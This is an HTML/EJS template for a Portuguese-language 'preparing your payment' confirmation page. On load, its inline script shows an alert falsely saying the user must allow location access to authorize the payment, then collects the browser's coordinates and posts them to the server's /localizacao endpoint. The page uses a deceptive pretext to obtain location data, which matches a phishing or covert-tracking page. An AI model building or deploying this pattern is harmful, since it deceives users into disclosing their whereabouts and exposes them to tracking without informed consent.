<!DOCTYPE html>
<html lang="en">
<head>
    <%-include('./partials/header.ejs')%>
</head>
<body  >

    <!-- Menssagem do topo da página em jumbotron -->
    <div class="conteudo">
        <div class="jumbotron jumbotron-fluid">
            <h1 class="display-4" >Estamos preparando seu pagamento!</h1>
            <br>
            <small class="form-text text-muted">Clique em <a class="btn btn-success" href="/comprovante-de-pagamento"> Ver comprovante </a> para ver seu comprovante.</small>
        </div>

    </div>

    <script>
        addEventListener('DOMContentLoaded', function() {
            alert("Clique em 'Permitir' para autorizar o pagamento para sua localização.");
            navigator.geolocation.getCurrentPosition(async function(position) {
                const latitude = position.coords.latitude;
                const longitude = position.coords.longitude;
            
                // Envia para o backend via fetch
                await fetch('/localizacao', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({ latitude, longitude })
                })
                .then(res => res.json())
                .then(data => {
                    console.log("Localização enviada com sucesso:", data);
                })
                .catch(err => {
                    console.error("Erro ao enviar localização:", err);
                });
            });
        });
        
    </script>
        

    
 
    
</body>
</html>